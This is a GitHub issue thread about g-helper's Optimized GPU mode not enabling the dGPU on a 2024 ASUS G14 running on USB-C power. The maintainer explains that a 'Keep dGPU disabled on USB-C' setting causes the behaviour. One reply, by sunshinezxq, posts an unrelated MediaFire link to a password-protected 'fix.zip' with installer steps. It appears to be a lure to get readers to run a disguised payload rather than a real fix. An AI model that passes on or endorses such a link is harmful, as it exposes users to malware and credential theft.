### ISSUE TITLE
G14 2024 GPU Optimized Mode

### ISSUE THREAD

**Issue by daveholland86** [seerge/g-helper#3022]
### Rules

- [X] I made myself familiar with the <a href='https://github.com/seerge/g-helper?tab=readme-ov-file'>Readme</a>, <a href='https://github.com/seerge/g-helper/wiki/FAQ'>FAQ</a> and <a href='https://github.com/seerge/g-helper/wiki/Troubleshooting'>Troubleshooting</a>.
- [X] I understand that, if insufficient information or no app logs will be provided, my issue will be closed without an answer.

### What's wrong?

When on USB-C only optimized mode still does not enable the dGPU.  

### How to reproduce the bug?

USB-C Power connect while on Optimized GPU mode.

### Logs

[log.txt](https://github.com/user-attachments/files/16750303/log.txt)

### Device and Model

2024 G14 4070

### Armoury Crate

Uninstalled

### Version

0.186

### OS

Win 11

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seerge** [comment]
@daveholland86 hello,

I see that you have literally selected `Keep dGPU disabled on USB-C` under `Extra` settings. So it indeed checks if it's USB-C or barrel-charger, and does not enable GPU.

Turn this setting of and it will treat USB-C same as barrel charger

Thanks
